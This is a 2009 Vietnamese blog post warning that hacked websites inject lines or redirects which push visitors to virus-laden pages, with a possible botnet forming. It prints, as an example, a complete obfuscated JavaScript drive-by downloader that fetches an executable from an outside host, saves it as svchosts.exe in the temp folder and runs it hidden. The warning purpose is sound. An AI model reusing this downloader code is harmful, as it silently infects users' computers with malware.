Trao đổi với tôi

http://www.buidao.com

7/4/09

[Virus] Nguy cơ botnet mới

(Tác giả:Phạm Đức Hải) Hôm nay vô tình gặp chị HYXĐ và có đề cập đến vấn đề này nên tôi nêu lại để các bạn biết.
Mấy tháng trước tôi đã gặp vài site bị hacker kiểm soát, những site này hacker chỉ thay đổi hoặc thêm vào đòng kiểu như sau :
(đừng mở link này có virus đấy happy )
Hoặc là một thẻ meta cho phép redỉect đến một site khác. Các site link vào tất cả đều là link virus. Tại thời điểm đó còn rất nhiều trình duyệt bị lỗi và chưa kịp update, ngay cả Firefox cũng dính. Khi người dùng internet vào các trang web đã bị thêm dòng như trên thì nó sẽ tự động download virus về máy mà không hề hay biết hoặc nó sẽ hiện ra 1 cái của sổ và bạn cứ thế bấm vào nút đồng ý. Vậy là máy tính bị dính virus.
Ví dụ cái link trên có đoạn code download con virus :

function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ipt.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"ream");
var e = s.Environment("Process");

var xml = null;
var url = 'http://www.sccdtp.com/Vietnam2.exe';
var bin = e.Item("TEMP") + "svchosts.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHTTP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}

if (! xml) return(0);

xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;

o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);

s.Run(bin,0);
}

Con virus có link url = 'http://www.sccdtp.com/Vietnam2.exe'; sẽ được lưu xuống máy nạn nhân với tên svchosts.exe

Các con virus này thậm trí có khả năng lây qua USB, nên nó nhân bản ra khá nhanh. Hiện tại tôi cũng chưa thử kiểm tra xem các con virus này có tạo ra một mạng botnet hay không ?
Nếu mà thực sự hacker lợi dụng điểm này để tạo ra một mạng botnet thì cựu kỳ nguy hiểm. Vì gần như bất kỳ USB nào cắm vào máy tôi đều có virus, một tuần ít nhất là vài lần tôi phải diệt virus giúp bạn bè, người thân, điều đó chứng tỏ số lượng máy tính bị nhiễm các virus này rất lớn.
Người dùng internet nên cẩn thận hơn với những trang mình vào và cũng nên cài các phần mềm diệt virus và tưởng lửa cho máy tính của mình.
Tôi chỉ dùng : ZoneAlarm và SAV, không biết các bạn dùng phần mềm nào ?